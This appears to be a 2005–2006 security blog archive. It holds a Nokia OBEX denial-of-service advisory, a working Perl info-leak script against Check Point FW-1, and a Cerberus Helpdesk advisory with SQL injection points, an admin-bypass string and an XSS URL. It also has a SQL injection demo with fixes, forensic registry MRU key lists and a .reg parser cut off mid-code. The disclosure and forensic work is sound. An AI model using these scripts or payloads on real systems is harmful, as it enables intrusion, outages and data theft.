Problem type: remote

Details:
--------------------------------------------------------------------------------
--------------------------

There is a flaw in the OBEX implementation of the Nokia 7610 (V4.0.437
15-09-04 RH51), and others, that disables this service if you send a
file with the name ":" or "\".

----
Quote from IROBEX12.pdf, page 40, section 4.3 (OBEX specification)

"Pushing objects into the inbox Objects are pushed into the inbox by using
the PUT command with a Name header. The string in the Name header
should not contain any path characters such as ':', '/' or '\'. Objects with
improperly formed names should be rejected."
----

The device asks for a PIN if you are not paired, or asks whether you want
to accept a connection from the remote device; you need to ACCEPT. The
risk is low because it does not work if you do not accept the incoming
connection.

If the connection is established, the file is sent and there is no "New
message arrived" notification, unlike when you send a correct file. That
is fine: the filename is dropped.

The problem is that the OBEX service does not work anymore after this: if
you try to send another file, or a vCard from another device, you cannot
connect to the remote OBEX service again.

Demonstration with Linux as the client:


jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610


jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing another file after sending the ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
--------------------------------------------------------------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.


dab @ !dSR
http://www.digitalsec.net

Get private address from fw-1 (old bug)

#!/usr/bin/perl
# Wed Dec 14 01:44:29 CET 2005
# Get private address from fw-1, nothing new, only a working port.
# ref: http://www.securityfocus.com/bid/8524/info
# !dSR www.digitalsec.es

use strict;
use warnings;
use IO::Socket;

my ($bytes, $host, @hosts) = ('', '');

# Connect to the firewall's TCP/256 service (see ref above).
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => 256,
                                 Proto    => 'tcp') or die "ERROR! $!\n";
print $sock "\x31\x00\x00\x00";
print $sock "\x00\x00\x00\x0C\x00\x00\x00\x04\xD4\xA3\x9F\x02";

# Collect the whole reply as one hex string.
while (<$sock>) { $bytes .= unpack("H*", $_); }
print "fw1 string: $bytes\n";
print substr($bytes, 16) . "\n";

# After the 8-byte header, every 8 hex digits (4 bytes) is one IPv4 address;
# stop at the first 0.0.0.x terminator.
my $i = 0;
foreach ((substr $bytes, 16) =~ /(.{8})/g) {
    $host = '';
    foreach my $ip (/(.{2})/g) {
        $host .= hex($ip) . ".";
    }
    $host =~ s/\.$//;
    last if $host =~ /0\.0\.0/;
    push(@hosts, $host);
}
foreach (@hosts) { $i++; print "ipaddr[$i]: $_\n"; }


December 19, 2005

Cerberus Helpdesk multiple vulnerabilities.

Title: Cerberus Helpdesk multiple vulnerabilities.
Severity: Medium
Affected: cerberus-gui (2.649), support-center (2.649<->3.2.0pr2)
Problem type: remote


Description:
-------------------------------------------------------------------------------

Cerberus Helpdesk is a WebGroup Media helpdesk suite based on a PHP environment.
Official webpage: http://www.cerberusweb.com/

Details:
-------------------------------------------------------------------------------

support-center:
*******************************

SQL injection in attachment_send.php (line 112):
You can download files from other users or use blind SQL injection attacks:
Example url:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N [SQL] &thread_id=1
CODE:
$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id = $file_id";

XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

cerberus-gui (parser-related):
*******************************

There are a few SQL injections if the XML is maliciously generated:

SQL injections in email_parser.php:

Function "is_queue_address" (line 1397) doesn't check the "$addy" value properly.
CODE:
$sql = sprintf("SELECT q.queue_name, q.queue_mode, q.queue_email_display_name, ".
    "qa.queue_addresses_id, qa.queue_id, qa.queue_address, ".
    "qa.queue_domain, q.queue_prefix, q.queue_response_open, ".
    "q.queue_send_open, q.queue_response_gated ".
    "FROM queue_addresses qa ".
    "LEFT JOIN queue q USING (queue_id) ".
    "WHERE LOWER(qa.queue_address) = '%s' ".
    "AND LOWER(qa.queue_domain) = '%s'",
    strtolower($mailbox),
    strtolower($domain));

Function "is_banned_address" (line 752) doesn't check "$address" properly.
CODE:
$sql = "SELECT a.address_banned FROM address a WHERE a.address_address = '".$address."'";

Function "is_admin_address" (line 1532): this function can be bypassed by using, as the email address, the following: "'OR'u.user_superuser'='1'--".
Example of the resulting query:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '' OR u.user_superuser = '1'
CODE:
$sql = "SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '$address'";


SQL injection in structs.php:
Function "cer_email_address_struct" (line 167) doesn't check "$a_address" before using it in the following query.
CODE:
$sql = "SELECT a.address_id,a.address_banned FROM address a WHERE a.address_address = '" . $a_address . "'";


cerberus-gui:
*******************************

SQL injection in cer_KnowledgebaseHandler.class.php:
Function "_load_article_details" (line 270): the "superuser" MD5 password can be fetched with blind SQL injection.
Example URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
CODE:
$sql = "SELECT k.kb_id, k.kb_entry_date, k.kb_public, k.kb_category_id, k.kb_keywords, kp.kb_problem_summary, kp.kb_problem_text, kp.kb_problem_text_is_html, " .
" ks.kb_solution_text, ks.kb_solution_text_is_html, kc.kb_category_name, u.user_login As entry_user, k.kb_avg_rating, k.kb_rating_votes " .
" FROM knowledgebase k LEFT JOIN knowledgebase_problem kp ON (kp.kb_id=k.kb_id) LEFT JOIN knowledgebase_solution ks on (ks.kb_id=k.kb_id) ".
" LEFT JOIN knowledgebase_categories kc ON (kc.kb_category_id=k.kb_category_id) LEFT JOIN user u ON (k.kb_entry_user=u.user_id) " .
" WHERE k.kb_id = " . $kbid;


SQL injection in "addresses_export.php":
Example URL:
POST: /cerberus-gui/addresses_export.php
sid=c61ce82aa50569705dd774c33644446c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x
CODE:
$sql = "SELECT DISTINCT a.address_address FROM ticket t LEFT JOIN thread th ON (t.min_thread_id=th.thread_id)
LEFT JOIN address a ON (th.thread_address_id=a.address_id) WHERE t.ticket_queue_id IN ($queues) ORDER BY a.address_address ASC;";

SQL injection in "display.php": "$thread" is not checked.
CODE:
$sql = "SELECT th.thread_address_id, a.address_address FROM thread th LEFT JOIN address a ON (th.thread_address_id = a.address_id) ".
"WHERE th.thread_id = " . $thread;

SQL injection in "display_ticket_thread.php" (line 52).
Example URL:
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]
CODE:
$sql = "SELECT t.ticket_id, t.ticket_subject, t.ticket_status, t.ticket_date, t.ticket_assigned_to_id, t.ticket_queue_id, t.ticket_priority, th.thread_address_id, ad.address_address, t.queue_addresses_id, q.queue_name " .
"FROM ticket t, thread th, address ad, queue q " .
"WHERE t.ticket_queue_id IN ($u_qids) AND th.ticket_id = t.ticket_id AND t.ticket_queue_id = q.queue_id AND th.thread_address_id = ad.address_id AND t.ticket_id = " . $ticket . " GROUP BY th.thread_id LIMIT 0,1";


Solution:
-------------------------------------------------------------------------------
Not available, maybe changing every "$cerberus_db->query($sql)" to "$cerberus_db->escape($sql)".


History:
-------------------------------------------------------------------------------
15-20/Nov/2005 --- Bugs discovered
11/Dec/2005 --- The author has been notified.
19/Dec/2005 --- Full disclosure
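
To make the pattern behind these findings concrete, here is an added example (not code from the advisory or from Cerberus Helpdesk) that rebuilds two of the quoted queries over an in-memory SQLite stand-in: the string-interpolated is_admin_address lookup and the unquoted numeric $kbid lookup from _load_article_details, each beside a version that binds its parameter. Table and column names come from the queries quoted above; the rows and the input strings are constructed for the example, and the address input is shaped so that the vulnerable query becomes the one shown under "Example of the resulting query".

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the helpdesk tables named in the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user (user_id INTEGER PRIMARY KEY, user_email TEXT, user_superuser TEXT);
        INSERT INTO user VALUES (1, 'admin@example.test', '1');
        INSERT INTO user VALUES (2, 'alice@example.test', '0');
        CREATE TABLE knowledgebase (kb_id INTEGER PRIMARY KEY, kb_public INTEGER);
        INSERT INTO knowledgebase VALUES (3, 0);
        INSERT INTO knowledgebase VALUES (4, 1);
    """)
    return conn


def is_admin_address_vulnerable(conn, address):
    """String-built lookup with the same shape as the is_admin_address query."""
    sql = ("SELECT u.user_id FROM user u WHERE u.user_email != '' "
           "AND u.user_email = '" + address + "'")
    return [row[0] for row in conn.execute(sql)]


def is_admin_address_fixed(conn, address):
    """Same lookup with a bound parameter: the address is data, never SQL."""
    sql = ("SELECT u.user_id FROM user u WHERE u.user_email != '' "
           "AND u.user_email = ?")
    return [row[0] for row in conn.execute(sql, (address,))]


def load_article_vulnerable(conn, kbid):
    """Numeric parameter concatenated unquoted, as in _load_article_details."""
    sql = ("SELECT k.kb_id FROM knowledgebase k WHERE k.kb_id = " + kbid
           + " ORDER BY k.kb_id")
    return [row[0] for row in conn.execute(sql)]


def load_article_fixed(conn, kbid):
    """Reject anything that is not an integer, then bind the integer."""
    try:
        kb_id = int(kbid)
    except (TypeError, ValueError):
        return None  # not a valid id: refuse instead of interpolating
    return [row[0] for row in conn.execute(
        "SELECT k.kb_id FROM knowledgebase k WHERE k.kb_id = ?", (kb_id,))]


if __name__ == "__main__":
    db = make_db()
    # Constructed input; produces the query shape shown under "Example of the resulting query".
    addr = "' OR u.user_superuser = '1'--"
    print("vulnerable:", is_admin_address_vulnerable(db, addr))    # [1]: the superuser
    print("fixed:     ", is_admin_address_fixed(db, addr))         # []
    print("vulnerable:", load_article_vulnerable(db, "4 OR 1=1"))  # [3, 4]: every article
    print("fixed:     ", load_article_fixed(db, "4 OR 1=1"))       # None: rejected
```

Binding happens before any query string exists, which is why the fix has to be applied to each input (a prepared statement for strings, an integer cast for ids) rather than to the finished $sql string. The same discipline applies to the `IN ($queues)` and `IN ($u_qids)` lists above: build one `?` placeholder per element and bind the list.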

Blind SQL Injection PoC Tool.

I have developed a script, based on ilo-'s code (www.reversing.org), that
performs brute force against websites that have some blind SQL injection flaw.

I have also published some flaws with which I tested the tool, as well as
a video showing how it works...

In addition, hacktimes is going to publish an article on blind SQL injection with
more information.

bsqlbf.pl: script
bsqlbf.avi: video


May 30, 2006

Proxy utilities for TCP/UDP.

Read on pen-test:

http://tripp.dynalias.org/


http://www.imperva.com/application_defense_center/tools.asp


http://www.int0x21.com/


http://jacquelin.potier.free.fr/networkstuff/

October 15, 2006

Reverse whois URLs and others..

Mental note: don't forget these links

http://www.netcraft.com
http://webhosting.info
http://www.domainsdb.net/
http://www.searchmee.com/web-info/ip-hunt.php
http://www.domaintools.com/reverse-ip/
http://www.archive.org
http://search.msn.com <-- Search by IP:x.x.x.x

Updated: Sun Oct 15 23:59:01 CEST 2006
http://www.seologs.com/ip-domains.html (thx aklis)
Updated: Thu Mar 15 12:03:33 CET 2007
http://www.tomdns.net/index.php

Mental note 2: some day, use the browser's bookmarks feature

October 16, 2006

Forensic applications whose URLs I always forget

MiTeC, for examining prefetch, thumbnails, LNKs, the registry, Recycle Bin information.... etc. etc. http://www.mitec.cz/
It seems WRA is no longer available on the official website; one day I'll upload a backup.
Updated: Mon Oct 16 00:04:20 CEST 2006


WRA.zip (danke DS)

November 12, 2006

Registry MRU Keys / Forensic

I haven't found much information, nor any list of the Windows registry keys where the most important MRUs can be found, the ones that should be checked in any self-respecting forensic investigation.

By doing a bit of reversing on MRU-Blaster and looking through several registries, I have been able to put together a reasonably acceptable list.

I'll try to manage this information in an Excel spreadsheet that we will leave hosted on the 514.es website.

This information can be queried with Perl over a .reg file (easily exportable from regedit itself, or with tools such as MiTeC's WRR) or with system commands if the machine is powered on:

C:\> reg query "HKCU\Software\Microsoft\Office\11.0\Excel\Resiliency\DocumentRecovery" /s

Or write a script that walks through a file and tries all the possible options (the "delims=" option keeps key paths that contain spaces whole):
C:\> for /F "delims=" %i in (forensic_mru.txt) do reg query "%i" /s

A quick way to search for these keys and extend the list could be:

C:\>reg query HKCU\ /s | find "Opened" | find "HKEY"
C:\>reg query HKCU\ /s | find "MRU" | find "HKEY"
C:\>reg query HKCU\ /s | find "Recent File List" | find "HKEY"

And this is the list....

HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft Word\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft Word\Settings\Open\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft Word\Settings\Create custom dictionary\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft Word\Settings\Add Custom Dictionary\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft PowerPoint\Settings\Insert Picture\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft PowerPoint\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Open\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Create custom dictionary\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Add Custom Dictionary\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Insert Picture\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\New from Existing Document\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft PowerPoint\Settings\Insert Picture\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft PowerPoint\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Document Imaging\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Document Imaging\Settings\Open\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Microsoft Word\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Microsoft Word\Settings\Open\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Microsoft Word\Settings\Select File to Merge Into Current Document\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Office\Settings\Open Office Document\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Office\Settings\Open Office Document\Any Text MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Microsoft PowerPoint\Settings\Save\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Excel\Recent File List
HKCU\Software\Microsoft\Office\9.0\Excel\Recent Files
HKCU\Software\Microsoft\Office\10.0\PowerPoint\Recent File List
HKU\.DEFAULT\Software\Microsoft\Office\10.0\Excel\Recent Files
HKCU\Software\Microsoft\Office\10.0\Excel\Recent Files
HKCU\Software\Microsoft\Office\11.0\Excel\Resiliency\DocumentRecovery
HKCU\Software\Microsoft\Office\10.0\Excel\Recent Templates
HKCU\Software\Microsoft\Office\10.0\PowerPoint\Recent Templates
HKCU\Software\Microsoft\Office\10.0\Word\Recent Templates
HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent File List
HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List
HKCU\Software\Gabest\Media Player Classic\Recent Dub List
HKU\.DEFAULT\Software\Microsoft\MSPaper\Persist File Name
HKCU\Software\Microsoft\MSPaper\Persist File Name
HKCU\Software\Microsoft\MSPaper\Recent File List
HKCU\Software\Foxit Software\Foxit Reader\Recent File List
HKU\.DEFAULT\Software\Microsoft\MSE\10.0\FileMRUList
HKU\.DEFAULT\Software\Microsoft\MSE\10.0\ProjectMRUList
HKU\.DEFAULT\Software\Microsoft\MSE\10.0\SolutionMRUList
HKCU\Software\Microsoft\MSE\10.0\FileMRUList
HKCU\Software\Microsoft\MSE\10.0\ProjectMRUList
HKCU\Software\Microsoft\MSE\10.0\SolutionMRUList
HKCU\Software\Corel\User Assistant\9\Recent Work\WordPerfect\Last Opened
HKCU\Software\Corel\User Assistant\10\Recent Work\WordPerfect\Last Opened
HKCU\Software\Corel\User Assistant\9\Recent Work\QuattroPro\Last Opened
HKCU\Software\Corel\User Assistant\10\Recent Work\QuattroPro\Last Opened
HKCU\Software\Corel\User Assistant\9\Recent Work\Corel Presentations\Last Opened
HKCU\Software\Corel\User Assistant\10\Recent Work\Corel Presentations\Last Opened
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\TypedURLs
HKCU\Software\Microsoft\MediaPlayer\Player\RecentFileList
HKCU\Software\Microsoft\MediaPlayer\Player\Settings\OpenDir
HKU\.DEFAULT\Software\Microsoft\MediaPlayer\Player\RecentFileList
HKCU\Software\Microsoft\MediaPlayer\Player\Settings\SaveAsDir
HKCU\Software\Microsoft\MediaPlayer\Preferences\CDRecordPath
HKCU\Software\Microsoft\MediaPlayer\Preferences\LastPlaylist
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List
HKCU\Software\Google\NavClient\1.1\History
HKU\.DEFAULT\Software\7-ZIP\FM
HKCU\Software\7-ZIP\FM
HKCU\Software\ahead\Nero - Burning Rom\Settings\BrowserDir
HKCU\Software\ahead\Nero - Burning Rom\Settings\ImageDir
HKCU\Software\ahead\Nero - Burning Rom\Settings\NeroCompilation
HKCU\Software\ahead\Nero - Burning Rom\Settings\WorkingDir
HKU\.DEFAULT\Software\Macromedia\Flash 6\Open Document
HKCU\Software\Macromedia\Flash 6\Open Document
HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\LastLoginTime
HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\LastOpenFileDir
HKCU\Software\SmartFTP\Queue
HKCU\Software\SmartFTP\LocalView
HKCU\Software\WinRAR\General\LastFolder
HKCU\Software\Nico Mak Computing\WinZip\directories
HKCU\Software\Adobe\Acrobat Reader\5.0\AVGeneral\cRecentFiles
HKU\.DEFAULT\Software\Adobe\Acrobat Reader\5.0\AVGeneral\cRecentFiles
HKU\.DEFAULT\Software\Adobe\Acrobat Reader\6.0\AVGeneral\cRecentFiles
HKCU\Software\Adobe\Acrobat Reader\6.0\AVGeneral\cRecentFiles
HKU\.DEFAULT\Software\Adobe\Adobe Acrobat\6.0\AVGeneral\cRecentFiles
HKCU\Software\Adobe\Adobe Acrobat\6.0\AVGeneral\cRecentFiles\c1
HKCU\Software\MGI\VideoWave\Recent File List
HKCU\Software\Sierra Imaging\Image Expert 2000\Recent Album List
HKCU\Software\ahead\Nero - Burning Rom\Recent File List
HKU\.Default\Software\ahead\Nero - Burning Rom\Recent File List
HKCU\Software\ahead\nero wave editor\Recent File List
HKU\.Default\Software\ahead\nero wave editor\Recent File List
HKCU\Software\ahead\Cover Designer\Recent File List
HKU\.Default\Software\ahead\Cover Designer\Recent File List
HKCU\Software\BVRP Software\Annuaire\Recent File List
HKCU\Software\Microsoft\HTML Help Workshop\Recent File List
HKCU\Software\Microsoft\HTML Help Workshop\Project Files
HKCU\Software\Microsoft\HTML Help Workshop\Html Titles
HKCU\Software\Microsoft\HTML Help Workshop\Compressed HTML
HKCU\Software\Microsoft\Picture It! Publishing\5.0\Recent File List
HKCU\Software\Software602\602Tab\Recent File List
HKCU\Software\Software602\WinMgr\1.0\602Tab\Recent Files
HKCU\Software\Software602\602Text\2000\Settings
HKCU\Software\TMT Development\TMT Pascal Lite 3
HKCU\Software\HeadLight\GetRight\TypedURLs
HKU\.Default\Software\HeadLight\GetRight\TypedURLs
HKCU\Software\Jasc\Paint Shop Pro 6\Recent File List
HKCU\Software\Jasc\Paint Shop Pro 7\Recent File List
HKCU\Software\Jasc\Paint Shop Pro 8\Recent File List
HKCU\Software\Greatis\Regrun2\RegAdviser\LocateHistory
HKCU\Software\Ontrack\PowerDesk\CurrentVersion\PDFind\FileNames
HKCU\Software\SpeedBit\Download Accelerator\HistoryCombo
HKCU\Software\Microsoft\Office\10.0\Clip Organizer\Search\Last Query
HKU\.Default\Software\Microsoft\Office\10.0\Clip Organizer\Search\Last Query
HKCU\Software\Microsoft\ClipArt Gallery\2.0\MRUDescription
HKU\.DEFAULT\Software\JetCar\JetCar\Recent File List
HKU\.DEFAULT\Software\JetCar\JetCar\DownDir
HKCU\Software\JetCar\JetCar\Recent File List
HKCU\Software\JetCar\JetCar\DownDir
HKU\.DEFAULT\Software\VB and VBA Program Settings\Microsoft Visual Basic AddIns\VisData6
HKCU\Software\VB and VBA Program Settings\Microsoft Visual Basic AddIns\VisData6
HKU\.DEFAULT\Software\CursorArts\MRU Items
HKCU\Software\CursorArts\MRU Items
HKU\.DEFAULT\Software\Spidersoft\WebZIP\Settings
HKCU\Software\Spidersoft\WebZIP\Settings
HKU\.DEFAULT\Software\Advanced Grapher\RecentFiles
HKCU\Software\Advanced Grapher\RecentFiles
HKU\.DEFAULT\Software\MeeSoft\ImageAnalyzer
HKCU\Software\MeeSoft\ImageAnalyzer
HKU\.DEFAULT\Software\InstallShield\Express\4.0\Recent File List
HKCU\Software\InstallShield\Express\4.0\Recent File List
HKU\.DEFAULT\Software\Impact\Microangelo\Animator\MRU List
HKU\.DEFAULT\Software\Impact\Microangelo\Librarian\MRU List
HKU\.DEFAULT\Software\Impact\Microangelo\Studio\MRU List
HKCU\Software\Impact\Microangelo\Animator\MRU List
HKCU\Software\Impact\Microangelo\Librarian\MRU List
HKCU\Software\Impact\Microangelo\Studio\MRU List
HKU\.DEFAULT\Software\FerretSoft\NetFerret\CurrentVersion\Web
HKCU\Software\FerretSoft\NetFerret\CurrentVersion\Web
HKU\.DEFAULT\Software\ORL\VNCviewer\MRU
HKCU\Software\ORL\VNCviewer\MRU
HKU\.DEFAULT\Software\PowerArchiver\Files
HKCU\Software\PowerArchiver\Files
HKU\.DEFAULT\Software\Microsoft\DevStudio\6.0\Recent File List
HKCU\Software\Microsoft\DevStudio\6.0\Recent File List
HKU\.DEFAULT\Software\e-merge\WinAce\2.0\MRU Items
HKCU\Software\e-merge\WinAce\2.0\MRU Items
HKU\.DEFAULT\Software\JGsoft\EditPadLite\Search
HKCU\Software\JGsoft\EditPadLite\Reopen
HKU\.DEFAULT\Software\VB and VBA Program Settings\3D Canvas\Application
HKCU\Software\VB and VBA Program Settings\3D Canvas\Application
HKU\.DEFAULT\Software\Vallen-Systeme GmbH\Vallen JPegger\MRU-Files-BMP&PCX
HKU\.DEFAULT\Software\Vallen-Systeme GmbH\Vallen JPegger\MRU-Folders-IMG
HKU\.DEFAULT\Software\Vallen-Systeme GmbH\Vallen JPegger\MRU-Folders-MP3
HKCU\Software\Vallen-Systeme GmbH\Vallen Zipper\MRU-Files-ZIP
HKU\.DEFAULT\Software\M.Dev Software\ZG5\MRU Items
HKCU\Software\M.Dev Software\ZG5\MRU Items
HKCU\Software\WinRAR\ArcHistory
HKCU\Software\Trident Software\PowerZip\Recent File List
HKCU\Software\Trident Software\PowerZip\Doc
HKCU\Software\WinRAR\DialogEditHistory\ExtrPath
HKCU\Software\Nico Mak Computing\WinZip\extract
HKCU\Software\Gnucleus\Searches
HKCU\Software\Kazaa\Search
HKU\.Default\Software\Kazaa\Search
HKCU\Software\Jasc\Animation Shop 2\Recent File List
HKCU\Software\Jasc\Animation Shop 3\Recent File List
HKCU\Software\Jasc\Jasc Media Center Plus\Recent File List
HKCU\Software\Jasc\Jasc WebDraw 1\Recent File List
HKCU\Software\Macromedia\Flash 5\Recent File List
HKCU\Software\Macromedia\Flash 6\Recent File List
HKCU\Software\Macromedia\Firework 6\Recent File List
HKCU\Software\Macromedia\Dreamweaver 4\Recent File List
HKCU\Software\Macromedia\Dreamweaver 6\Recent File List
HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication
HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication
HKCU\SOFTWARE\Microsoft\DirectInput\MostRecentApplication
HKCU\Software\Ulead Systems\Ulead PhotoImpact\7.0\Recent File List
HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor
HKU\.DEFAULT\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor
HKCU\Software\Creative Tecg\Creative Wavestudio\Settings
HKCU\Software\Freeware\VirtualDub\MRU List
HKCU\Software\Microsoft\Journal Viewer\MRU
HKCU\Software\Ying3\DLExpert\MAIN
HKCU\Software\Microsoft\Search Assistant\ACMru\5001
HKCU\InstallLocationsMRU
HKU\.Default\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU
HKU\.Default\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU
HKCU\Software\RealVNC\VNCViewer4\MRU
HKCU\Software\Ahead\Cover Designer\Recent File List
HKCU\Software\Ahead\Nero - Burning Rom\Recent File List
HKCU\Software\Ahead\Nero WaveEditor\Recent File List
HKCU\Software\DVD Shrink\DVD Shrink 3.2\Recent File List
HKCU\Software\DVDAuthor2\DVD-lab\Recent File List
HKCU\Software\Macromedia\Dreamweaver 8\Recent File List
HKCU\Software\Macromedia\Fireworks\8\ini\Recent File List
HKCU\Software\Macromedia\Flash 8\Recent File List
HKCU\Software\Microsoft\Consola de administración de Microsoft\Recent File List
HKCU\Software\SoulSeek\SoulSeek\Recent File List
HKCU\Software\WinHTTrack Website Copier\WinHTTrack Website Copier\Recent File List
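
The "Perl over a .reg file" approach mentioned above, written here in Python as an added example (not the author's script): it parses a regedit export, rewrites the long hive names into the HKCU/HKU notation the list uses, and reports every value under each watched key. The .reg text and the short watch-list are constructed for the example; MRU_KEYS is meant to be extended with the rest of the list above.

```python
import re
import sys

# Long hive names regedit writes into a .reg export -> short form used in the list above.
HIVES = {"HKEY_CURRENT_USER": "HKCU", "HKEY_USERS": "HKU", "HKEY_LOCAL_MACHINE": "HKLM"}

# Watch-list: a handful of keys taken from the list above (extend with the rest).
MRU_KEYS = [
    r"HKCU\Software\Microsoft\Internet Explorer\TypedURLs",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List",
    r"HKCU\Software\WinRAR\ArcHistory",
    r"HKCU\Software\Microsoft\Search Assistant\ACMru\5001",
]

# Constructed .reg export used when no file is given (not data from a real system).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]
"url1"="http://intranet.example.test/"
"url2"="http://www.example.test/"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File1"="C:\\Users\\alice\\Documents\\notes.rtf"

[HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5001]
"000"="invoice"
"MRUListEx"=hex:00,00,00,00,ff,ff,ff,ff

[HKEY_CURRENT_USER\Software\Example\NotAnMRU]
@="ignored"
'''

_KEY_RE = re.compile(r"^\[(-?)(.+)\]$")
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def short_key(long_key):
    """HKEY_CURRENT_USER\\... -> HKCU\\..., matching the list's notation."""
    hive, sep, rest = long_key.partition("\\")
    return HIVES.get(hive.upper(), hive) + sep + rest


def _unescape(s):
    """Undo the backslash escaping regedit applies inside quoted strings."""
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: data}}.

    Quoted strings are unescaped; dword:/hex: data is kept as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor") \
                or line.upper() == "REGEDIT4":
            continue
        m = _KEY_RE.match(line)
        if m:
            # "[-HKEY...]" marks a key deletion and carries no values.
            current = None if m.group(1) else short_key(m.group(2))
            if current is not None:
                keys.setdefault(current, {})
            continue
        if current is None:
            continue
        m = _VALUE_RE.match(line)
        if not m:
            continue  # continuation line of a multi-line hex: value
        name = "@" if m.group(1) is None else _unescape(m.group(1))
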